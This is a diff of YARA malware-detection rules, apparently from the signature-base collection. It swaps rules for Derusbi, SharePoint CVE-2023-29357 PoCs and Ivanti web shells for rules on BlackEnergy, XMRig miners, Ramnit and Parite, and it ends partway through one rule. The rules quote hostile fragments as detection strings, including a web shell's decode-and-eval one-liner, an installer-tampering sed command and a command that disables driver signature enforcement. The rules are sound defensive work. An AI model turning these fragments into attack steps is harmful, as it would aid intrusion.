-		uint32( 0 ) == 0x464C457F and ( ( 1 of ( $a* ) and 4 of ( $b* ) ) or ( 1 of ( $a* ) and 1 of ( $c* ) ) or 2 of ( $a* ) or all of ( $b* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and 8 of them
 }
-rule SIGNATURE_BASE_Apt_Win_Exe_Trojan_Derusbi_1 : FILE
+rule SIGNATURE_BASE_Blackenergy_Killdisk_2 : FILE
 {
 	meta:
-		description = "Detects Derusbi Backdoor Win32"
-		author = "Fidelis Cybersecurity"
-		id = "6e7fecfa-f801-59b2-a394-df4c368011b7"
-		date = "2016-02-29"
-		modified = "2023-12-05"
-		reference = "https://github.com/fideliscyber/indicators/tree/master/FTA-1021"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turbo_campaign.yar#L130-L189"
+		description = "Detects KillDisk malware from BlackEnergy"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f0304e87-a278-5963-9af0-935c088c00ec"
+		date = "2016-01-03"
+		modified = "2023-01-06"
+		reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_blackenergy.yar#L117-L138"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "02fb4da724b257aef0ec0fecfe5b7a25a23fe4dd5baae0ddd2d21350b9af34e9"
-		score = 75
-		quality = 83
+		logic_hash = "38ce9ab347690914f27e7ae89cc6fb2af02ee223e21822eb3b75fde772d3eaff"
+		score = 80
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "11b7b8a7965b52ebb213b023b6772dd2c76c66893fc96a18a9a33c8cf125af80"
+		hash2 = "5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6"
+		hash3 = "f52869474834be5a6b5df7f8f0c46cbc7e9b22fa5cb30bee0f363ec6eb056b95"
 
 	strings:
-		$sa_4 = "HOST: %s:%d"
-		$sa_6 = "User-Agent: Mozilla"
-		$sa_7 = "Proxy-Connection: Keep-Alive"
-		$sa_8 = "Connection: Keep-Alive"
-		$sa_9 = "Server: Apache"
-		$sa_12 = "ZwUnloadDriver"
-		$sa_13 = "ZwLoadDriver"
-		$sa_18 = "_time64"
-		$sa_19 = "DllRegisterServer"
-		$sa_20 = "DllUnregisterServer"
-		$sa_21 = { 8b [5] 8b ?? d3 ?? 83 ?? 08 30 [5] 40 3b [5] 72 }
-		$sb_1 = "PCC_CMD_PACKET"
-		$sb_2 = "PCC_CMD"
-		$sb_3 = "PCC_BASEMOD"
-		$sb_4 = "PCC_PROXY"
-		$sb_5 = "PCC_SYS"
-		$sb_6 = "PCC_PROCESS"
-		$sb_7 = "PCC_FILE"
-		$sb_8 = "PCC_SOCK"
-		$sc_1 = "bcdedit -set testsigning" wide ascii
-		$sc_2 = "update.microsoft.com" wide ascii
-		$sc_3 = "_crt_debugger_hook" wide ascii
-		$sc_4 = "ue8G5" wide ascii
-		$sd_2 = "\\\\.\\pipe\\%s" wide ascii
-		$sd_3 = ".dat" wide ascii
-		$sd_4 = "CONNECT %s:%d" wide ascii
-		$sd_5 = "\\Device\\" wide ascii
-		$se_1 = "-%s-%04d" wide ascii
-		$se_2 = "-%04d" wide ascii
-		$se_5 = "2.03" wide ascii
+		$s0 = "%c:\\~tmp%08X.tmp" fullword ascii
+		$s1 = "%s%08X.tmp" fullword ascii
+		$s2 = ".exe.sys.drv.doc.docx.xls.xlsx.mdb.ppt.pptx.xml.jpg.jpeg.ini.inf.ttf" wide
+		$s3 = "%ls_%ls_%ls_%d.~tmp" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $sa_* ) or ( ( 8 of ( $sa_* ) ) and ( ( 5 of ( $sb_* ) ) or ( 3 of ( $sc_* ) ) or ( all of ( $sd_* ) ) or ( 1 of ( $sc_* ) and all of ( $se_* ) ) ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and 3 of them
 }
-rule SIGNATURE_BASE_REGEORG_Tuneller_Generic : FILE
+rule SIGNATURE_BASE_Blackenergy_Driver_USBMDM : FILE
 {
 	meta:
-		description = "No description has been set in the source file - Signature Base"
-		author = "Mandiant"
-		id = "a87979b7-2732-5a32-b3f3-a815a58b6589"
-		date = "2021-12-20"
+		description = "Black Energy Driver"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d5e8faf0-38cb-5193-b859-83ea09278011"
+		date = "2016-01-04"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/unc3524-eye-spy-email"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/webshell_regeorg.yar#L1-L20"
+		reference = "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_blackenergy.yar#L140-L163"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ba22992ce835dadcd06bff4ab7b162f9"
-		logic_hash = "1657928875c3cd2d5bf774929b0497d78f0211b321f8a4138cc9b8c80b9f99d6"
+		logic_hash = "273a00de7af1b7490bff2eae545b358a5483bae0d55a560bef7bd9fa24b0f1d9"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		date_modified = "2021-12-20"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "7874a10e551377d50264da5906dc07ec31b173dee18867f88ea556ad70d8f094"
+		hash2 = "b73777469f939c331cbc1c9ad703f973d55851f3ad09282ab5b3546befa5b54a"
+		hash3 = "edb16d3ccd50fc8f0f77d0875bf50a629fa38e5ba1b8eeefd54468df97eba281"
+		hash4 = "ac13b819379855af80ea3499e7fb645f1c96a4a6709792613917df4276c583fc"
+		hash5 = "7a393b3eadfc8938cbecf84ca630e56e37d8b3d23e084a12ea5a7955642db291"
+		hash6 = "405013e66b6f137f915738e5623228f36c74e362873310c5f2634ca2fda6fbc5"
+		hash7 = "244dd8018177ea5a92c70a7be94334fa457c1aab8a1c1ea51580d7da500c3ad5"
+		hash8 = "edcd1722fdc2c924382903b7e4580f9b77603110e497393c9947d45d311234bf"
 
 	strings:
-		$s1 = "System.Net.IPEndPoint"
-		$s2 = "Response.AddHeader"
-		$s3 = "Request.InputStream.Read"
-		$s4 = "Request.Headers.Get"
-		$s5 = "Response.Write"
-		$s6 = "System.Buffer.BlockCopy"
-		$s7 = "Response.BinaryWrite"
-		$s8 = "SocketException soex"
+		$s1 = "USB MDM Driver" fullword wide
+		$s2 = "KdDebuggerNotPresent" fullword ascii
+		$s3 = "KdDebuggerEnabled" fullword ascii
 
 	condition:
-		filesize < 1MB and 7 of them
+		uint16( 0 ) == 0x5a4d and filesize < 180KB and all of them
 }
-rule SIGNATURE_BASE_Visualdiscovery_Lonovo_Superfish_SSL_Hijack : FILE
+rule SIGNATURE_BASE_Blackenergy_Driver_AMDIDE : FILE
 {
 	meta:
-		description = "Lenovo Superfish SSL Interceptor - file VisualDiscovery.exe"
-		author = "Florian Roth (Nextron Systems) / improved by kbandla"
-		id = "200c016e-7ad8-5b58-be5f-7866e91d60e9"
-		date = "2015-02-19"
+		description = "Black Energy Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e5b57c33-87f7-5411-995c-384e0afa0348"
+		date = "2016-01-04"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/4nc4p/status/568325493558272000"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/threat_lenovo_superfish.yar#L4-L23"
+		reference = "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_blackenergy.yar#L165-L188"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0f156a51dccafe32467b64251507928b1c7a1b04595063aa66aa69da6c4cc4fc"
+		logic_hash = "cb6017327be464bcc2d9efca676c58a9ede45d122460bc167f87e78880c4ace5"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "99af9cfc7ab47f847103b5497b746407dc566963"
-		hash2 = "f0b0cd0227ba302ac9ab4f30d837422c7ae66c46"
-		hash3 = "f12edf2598d8f0732009c5cd1df5d2c559455a0b"
-		hash4 = "343af97d47582c8150d63cbced601113b14fcca6"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "32d3121135a835c3347b553b70f3c4c68eef711af02c161f007a9fbaffe7e614"
+		hash2 = "3432db9cb1fb9daa2f2ac554a0a006be96040d2a7776a072a8db051d064a8be2"
+		hash3 = "90ba78b6710462c2d97815e8745679942b3b296135490f0095bdc0cd97a34d9c"
+		hash4 = "97be6b2cec90f655ef11ed9feef5b9ef057fd8db7dd11712ddb3702ed7c7bda1"
+		hash5 = "5111de45210751c8e40441f16760bf59856ba798ba99e3c9532a104752bf7bcc"
+		hash6 = "cbc4b0aaa30b967a6e29df452c5d7c2a16577cede54d6d705ca1f095bd6d4988"
+		hash7 = "1ce0dfe1a6663756a32c69f7494ad082d293d32fe656d7908fb445283ab5fa68"
 
 	strings:
-		$s2 = "Invalid key length used to initialize BlowFish." fullword ascii
-		$s3 = "GetPCProxyHandler" fullword ascii
-		$s4 = "StartPCProxy" fullword ascii
-		$s5 = "SetPCProxyHandler" fullword ascii
+		$s1 = " AMD IDE driver" fullword wide
+		$s2 = "SessionEnv" fullword wide
+		$s3 = "\\DosDevices\\{C9059FFF-1C49-4445-83E8-" wide
+		$s4 = "\\Device\\{C9059FFF-1C49-4445-83E8-" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2MB and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and all of them
 }
-rule SIGNATURE_BASE_LOG_EXPL_Sharepoint_CVE_2023_29357_Sep23_1 : CVE_2023_29357
+
+rule SIGNATURE_BASE_MAL_XMR_Miner_May19_1 : HIGHVOL FILE
 {
 	meta:
-		description = "Detects log entries that could indicate a successful exploitation of CVE-2023-29357 on Microsoft SharePoint servers with the published Python POC"
-		author = "Florian Roth (with help from @LuemmelSec)"
-		id = "9fa77216-c0d6-55e5-bbcc-adb9438ca456"
-		date = "2023-09-28"
-		modified = "2023-10-01"
-		reference = "https://twitter.com/Gi7w0rm/status/1706764212704591953?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_sharepoint_cve_2023_29357.yar#L2-L20"
+		description = "Detects Monero Crypto Coin Miner"
+		author = "Florian Roth (Nextron Systems)"
+		id = "233d1d47-de67-55a9-ae7e-46b5dd34e6ce"
+		date = "2019-05-31"
+		modified = "2023-12-05"
+		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_nansh0u.yar#L15-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "03e3a4715c8683dc8d03ad6720c1c9b40482bd0bfa3020aa1152565ec9ec929f"
-		score = 70
-		quality = 60
-		tags = "CVE-2023-29357"
+		logic_hash = "85a65fd2355850b7f5261ad41091e181562938356ba3dae7d867f7ac8922a16e"
+		score = 85
+		quality = 85
+		tags = "HIGHVOL, FILE"
+		hash1 = "d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc"
 
 	strings:
-		$xr1 = /GET [a-z\.\/_]{0,40}\/web\/(siteusers|currentuser) - (80|443) .{10,200} (python-requests\/[0-9\.]{3,8}|-) [^ ]{1,160} [^4]0[0-9] /
+		$x1 = "donate.ssl.xmrig.com" fullword ascii
+		$x2 = "* COMMANDS     'h' hashrate, 'p' pause, 'r' resume" fullword ascii
+		$s1 = "[%s] login error code: %d" fullword ascii
+		$s2 = "\\\\?\\pipe\\uv\\%p-%lu" fullword ascii
 
 	condition:
-		$xr1
+		uint16( 0 ) == 0x5a4d and filesize < 14000KB and ( pe.imphash ( ) == "25d9618d1e16608cd5d14d8ad6e1f98e" or 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_HKTL_EXPL_POC_PY_Sharepoint_CVE_2023_29357_Sep23_1 : CVE_2023_29357 FILE
+
+rule SIGNATURE_BASE_HKTL_CN_Prochook_May19_1 : FILE
 {
 	meta:
-		description = "Detects a Python POC to exploit CVE-2023-29357 on Microsoft SharePoint servers"
-		author = "Florian Roth"
-		id = "2be524ab-f360-56b8-9ce3-e15036855c67"
-		date = "2023-10-01"
-		modified = "2023-10-01"
-		reference = "https://github.com/Chocapikk/CVE-2023-29357"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_sharepoint_cve_2023_29357.yar#L22-L35"
+		description = "Detects hacktool used by Chinese threat groups"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ae4e2613-8254-5ea6-af88-2f08ebe4da33"
+		date = "2019-05-31"
+		modified = "2023-12-05"
+		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_nansh0u.yar#L38-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fec7762ab23ba5ee9e793000d080b1d64b93157c6ead9e6939ccfb3c168dd360"
-		score = 80
+		logic_hash = "de55990c130702a05e96ee769707a81ce0ec58a515d75a9a99b20265ce3db682"
+		score = 75
 		quality = 85
-		tags = "CVE-2023-29357, FILE"
-
-	strings:
-		$x1 = "encoded_payload = base64.urlsafe_b64encode(json.dumps(payload).encode()).rstrip(b'=')"
+		tags = "FILE"
+		hash1 = "02ebdc1ff6075c15a44711ccd88be9d6d1b47607fea17bef7e5e17f8da35293e"
 
 	condition:
-		filesize < 30KB and $x1
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and pe.imphash ( ) == "343d580dd50ee724746a5c28f752b709"
 }
-rule SIGNATURE_BASE_HKTL_EXPL_POC_NET_Sharepoint_CVE_2023_29357_Sep23_1 : CVE_2023_29357 FILE
+rule SIGNATURE_BASE_SUSP_PDB_CN_Threat_Actor_May19_1 : FILE
 {
 	meta:
-		description = "Detects a C# POC to exploit CVE-2023-29357 on Microsoft SharePoint servers"
-		author = "Florian Roth"
-		id = "aa6aeb00-b162-538c-a670-cbff525dd8f1"
-		date = "2023-10-01"
+		description = "Detects PDB path user name used by Chinese threat actors"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fc6969ed-5fc1-5b3b-9659-c6fc1c9e2f9c"
+		date = "2019-05-31"
 		modified = "2023-12-05"
-		reference = "https://github.com/LuemmelSec/CVE-2023-29357"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_sharepoint_cve_2023_29357.yar#L37-L62"
+		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_nansh0u.yar#L52-L65"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cf621cc9c5074f531df61623b09db68478e94ae6a9a7acc26aa8d9dde79bd30c"
-		score = 80
+		logic_hash = "adcfe3d4bc6fcaf6be4f70c91fb2150bfa2d61f1ba84f96a0bf0c39ed0380b6a"
+		score = 65
 		quality = 85
-		tags = "CVE-2023-29357, FILE"
+		tags = "FILE"
+		hash1 = "01c3882e8141a25abe37bb826ab115c52fd3d109c4a1b898c0c78cee8dac94b4"
 
 	strings:
-		$x1 = "{f22d2de0-606b-4d16-98d5-421f3f1ba8bc}" ascii wide
-		$x2 = "{F22D2DE0-606B-4D16-98D5-421F3F1BA8BC}" ascii wide
-		$s1 = "Bearer"
-		$s2 = "hashedprooftoken"
-		$s3 = "/_api/web/"
-		$s4 = "X-PROOF_TOKEN"
-		$s5 = "00000003-0000-0ff1-ce00-000000000000"
-		$s6 = "IsSiteAdmin"
+		$x1 = "C:\\Users\\zcg\\Desktop\\" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and ( 1 of ( $x* ) or all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them
 }
-rule SIGNATURE_BASE_APT_UNC5221_Ivanti_Forensicartifacts_Jan24_1 : FILE
+
+rule SIGNATURE_BASE_MAL_Ramnit_May19_1 : FILE
 {
 	meta:
-		description = "Detects forensic artifacts found in the Ivanti VPN exploitation campaign by APT UNC5221"
-		author = "Florian Roth"
-		id = "49ba2a96-379d-5a58-979d-45e83fa546e7"
-		date = "2024-01-11"
-		modified = "2024-04-24"
-		reference = "https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_report_ivanti_mandiant_jan24.yar#L2-L16"
+		description = "Detects Ramnit malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f8fa3557-556e-5680-9f1a-2ecf118ade75"
+		date = "2019-05-31"
+		modified = "2023-12-05"
+		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_nansh0u.yar#L67-L78"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7f485f41072f5584dc76e71564e13066d9fe41685f33bff9c2886fa7d2155f94"
+		logic_hash = "51d574f457c37eba3c29f869e03244b9471be6f6c8319aa0ddfad34be748eb53"
 		score = 75
 		quality = 85
 		tags = "FILE"
-
-	strings:
-		$x1 = "system(\"chmod a+x /home/etc/sql/dsserver/sessionserver.sh\");"
-		$x2 = "SSH-2.0-OpenSSH_0.3xx."
-		$x3 = "sed -i '/retval=$(exec $installer $@)/d' /pkg/do-install"
+		hash1 = "d7ec3fcd80b3961e5bab97015c91c843803bb915c13a4a35dfb5e9bdf556c6d3"
 
 	condition:
-		filesize < 5MB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and pe.imphash ( ) == "500cd02578808f964519eb2c85153046"
 }
-rule SIGNATURE_BASE_M_Hunting_Backdoor_ZIPLINE_1 : FILE
+rule SIGNATURE_BASE_MAL_Parite_Malware_May19_1 : FILE
 {
 	meta:
-		description = "This rule detects unique strings in ZIPLINE, a passive ELF backdoor that waits for incoming TCP connections to receive commands from the threat actor."
-		author = "Mandiant"
-		id = "753884d6-d4c1-5e94-9d2c-f6ebb7bfaf85"
-		date = "2024-01-11"
-		modified = "2024-04-24"
-		reference = "https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_report_ivanti_mandiant_jan24.yar#L18-L38"
+		description = "Detects Parite malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f4c9da17-9894-5243-828a-827accb0bac5"
+		date = "2019-05-31"
+		modified = "2023-12-05"
+		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_nansh0u.yar#L80-L100"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "41857ba465dd1f2e1aa8c1eed36b73606385eeedf233fd480bb8a4ef15499174"
-		score = 75
+		logic_hash = "b458b05178f18be1e936c1b42bbd91c739f288570fca759b85f1bb143899f1a8"
+		score = 80
 		quality = 85
 		tags = "FILE"
+		hash1 = "c9d8852745e81f3bfc09c0a3570d018ae8298af675e3c6ee81ba5b594ff6abb8"
+		hash2 = "8d47b08504dcf694928e12a6aa372e7fa65d0d6744429e808ff8e225aefa5af2"
+		hash3 = "285e3f21dd1721af2352196628bada81050e4829fb1bb3f8757a45c221737319"
+		hash4 = "b987dcc752d9ceb3b0e6cd4370c28567be44b789e8ed8a90c41aa439437321c5"
 
 	strings:
-		$s1 = "SSH-2.0-OpenSSH_0.3xx" ascii
-		$s2 = "$(exec $installer $@)" ascii
-		$t1 = "./installer/do-install" ascii
-		$t2 = "./installer/bom_files/" ascii
-		$t3 = "/tmp/data/root/etc/ld.so.preload" ascii
-		$t4 = "/tmp/data/root/home/etc/manifest/exclusion_list" ascii
+		$s1 = "taskkill /im cmd.exe /f" fullword ascii
+		$s2 = "LOADERX64.dll" fullword ascii
+		$x1 = "\\dllhot.exe" ascii
+		$x2 = "dllhot.exe --auto --any --forever --keepalive" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize < 5MB and ( ( 1 of ( $s* ) ) or ( 3 of ( $t* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 10000KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_M_Hunting_Dropper_WIREFIRE_1 : FILE
+
+rule SIGNATURE_BASE_MAL_Parite_Malware_May19_2 : FILE
 {
 	meta:
-		description = "This rule detects WIREFIRE, a web shell written in Python that exists as trojanized logic to a component of the pulse secure appliance."
-		author = "Mandiant"
-		id = "051244f0-00b1-5a4b-8c81-f4ce6f1aa22a"
-		date = "2024-01-11"
-		modified = "2024-04-24"
-		reference = "https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_report_ivanti_mandiant_jan24.yar#L40-L58"
+		description = "Detects Parite malware based on Imphash"
+		author = "Florian Roth (Nextron Systems)"
+		id = "33970268-610c-5abf-9e9e-83dae0c81064"
+		date = "2019-05-31"
+		modified = "2023-12-05"
+		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_nansh0u.yar#L102-L118"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6de651357a15efd01db4e658249d4981"
-		logic_hash = "c389a666bd093cdd7700385da43c8fa58b9f3d899e658c516df0f3aca439401d"
+		logic_hash = "060a26ed6679b7038f1a89385220ad9112d3102023ea9d141332077f79bbe728"
 		score = 75
 		quality = 85
 		tags = "FILE"
-
-	strings:
-		$s1 = "zlib.decompress(aes.decrypt(base64.b64decode(" ascii
-		$s2 = "aes.encrypt(t+('\\x00'*(16-len(t)%16))" ascii
-		$s3 = "Handles DELETE request to delete an existing visits data." ascii
-		$s4 = "request.data.decode().startswith('GIF'):" ascii
-		$s5 = "Utils.api_log_admin" ascii
+		hash1 = "c9d8852745e81f3bfc09c0a3570d018ae8298af675e3c6ee81ba5b594ff6abb8"
+		hash2 = "8d47b08504dcf694928e12a6aa372e7fa65d0d6744429e808ff8e225aefa5af2"
+		hash3 = "285e3f21dd1721af2352196628bada81050e4829fb1bb3f8757a45c221737319"
+		hash4 = "b987dcc752d9ceb3b0e6cd4370c28567be44b789e8ed8a90c41aa439437321c5"
 
 	condition:
-		filesize < 10KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 18000KB and ( pe.imphash ( ) == "b132a2719be01a6ef87d9939d785e19e" or pe.imphash ( ) == "78f4f885323ffee9f8fa011455d0523d" )
 }
-rule SIGNATURE_BASE_M_Hunting_Webshell_LIGHTWIRE_2 : FILE
+rule SIGNATURE_BASE_EXPL_Strings_CVE_POC_May19_1 : FILE
 {
 	meta:
-		description = "Detects LIGHTWIRE based on the RC4 decoding and execution 1-liner."
-		author = "Mandiant (modified by Florian Roth)"
-		id = "9451da63-c68e-51e8-b4b1-c3082d46fbf6"
-		date = "2024-01-11"
-		modified = "2024-01-12"
-		reference = "https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_report_ivanti_mandiant_jan24.yar#L60-L81"
+		description = "Detects strings used in CVE POC noticed in May 2019"
+		author = "Florian Roth (Nextron Systems)"
+		id = "df11e0b1-e907-5a24-a3e7-0e78acb379f7"
+		date = "2019-05-31"
+		modified = "2023-12-05"
+		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_nansh0u.yar#L120-L136"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3d97f55a03ceb4f71671aa2ecf5b24e9"
-		logic_hash = "37b22a6c45dd53bc7b3f0c75cc5072e990246fea24591d192176c0b496e92084"
-		score = 75
+		logic_hash = "b470e9f5716130d810e519abb8d4e1058b5a806d59ddae53a40cac5597fbb874"
+		score = 80
 		quality = 85
 		tags = "FILE"
+		hash1 = "01c3882e8141a25abe37bb826ab115c52fd3d109c4a1b898c0c78cee8dac94b4"
 
 	strings:
-		$s1 = "eval{my"
-		$s2 = "Crypt::RC4->new(\""
-		$s3 = "->RC4(decode_base64(CGI::param('"
-		$s4 = ";eval $"
-		$s5 = "\"Compatibility check: $@\";}"
+		$x1 = "\\Debug\\poc_cve_20" ascii
+		$x2 = "\\Release\\poc_cve_20" ascii
+		$x3 = "alloc fake fail: %x!" fullword ascii
+		$x4 = "Allocate fake tagWnd fail!" fullword ascii
 
 	condition:
-		filesize < 10KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them
 }
-rule SIGNATURE_BASE_M_Hunting_Dropper_THINSPOOL_1 : FILE
+rule SIGNATURE_BASE_SUSP_Autocad_Lsp_Malware : FILE
 {
 	meta:
-		description = "This rule detects THINSPOOL, a dropper that installs the LIGHTWIRE web shell onto a Pulse Secure system."
-		author = "Mandiant"
-		id = "dd340f72-0a2c-5b66-9e31-1c0f20cd842f"
-		date = "2024-01-11"
-		modified = "2024-04-24"
-		reference = "https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_report_ivanti_mandiant_jan24.yar#L83-L100"
+		description = "Recognizes malicious autocad files written in LISP"
+		author = "John Lambert @JohnLaTwC"
+		id = "3a4ac6e1-d7ea-5b9a-a386-9f881fad073b"
+		date = "2019-02-04"
+		modified = "2023-12-05"
+		reference = "http://cadablog.blogspot.com/2012/06/acadmedrea-malware-autocad-based-virus.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_autocad_lsp_malware.yar#L1-L52"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "677c1aa6e2503b56fe13e1568a814754"
-		logic_hash = "a8043822cd36a802ba6656c42085f09d67cedb0689c9da48438d788b320bd6c0"
-		score = 75
-		quality = 85
+		logic_hash = "4a5fe7016e27431407435541ab71ab00e6fd53418e2ebc19f8764c98728b89a6"
+		score = 65
+		quality = 52
 		tags = "FILE"
+		hash1 = "1313398e2f39fcf17225c7e915b92bd74292d427163112d70b82f271359b84d5"
+		hash2 = "2382e6908e6b44c0676c537cb8caa239c8938cb01e62a45c7247d40ab7dbf0ad"
+		hash3 = "23cf3e7f41a755a45e396e5caa3e753e64655b91fe665808f71aa68718670dc8"
+		hash4 = "23f018135afc4890e1e09bef9386e45e2236fc43550383b7888cddbdefbcd950"
+		hash5 = "4a8da078a02fc49b7f13cd19d10519b1bf31ed0ab04268f018ad4733918e28ff"
+		hash6 = "4cca7b530213ef71b2e69a5b11178b61044f93dc60f4e8e568ddb3bb06749ba2"
+		hash7 = "5390271899e1ebf884380f5da7d26dff527d13922d3b3f8a3b5ec9152b9dfa40"
+		hash8 = "53ef3029f36a3a2b912a722d64eef04f599f6f683c6dcb31a122ab1c98f38700"
+		hash9 = "7f7d78931370fa693cbfa50aadecc09b4ab93917dcde3a653bd67fa6dc274cdc"
+		hash10 = "8147cc97b6203c7eccfbd10457eb52527f74180ebae79bf3cb9c9edb582e708c"
+		hash11 = "8a3113ceb45725539e4ccef5ea1482c29b2bbe0ce7ede72f59f9949a0e04c5cd"
+		hash12 = "a0c77993f84ca8fb3096579088326bc907b003327f5885660ea5ba47e2cbc6de"
+		hash13 = "a20ac5e0bfa2ee3cb4092907420c23d1f94a1ed1b59cc3d351e5602d7206178c"
+		hash14 = "b201969ed7bf782d01011211b48bfccb9dd41a3a5a7456cdff2167f1e4d1b954"
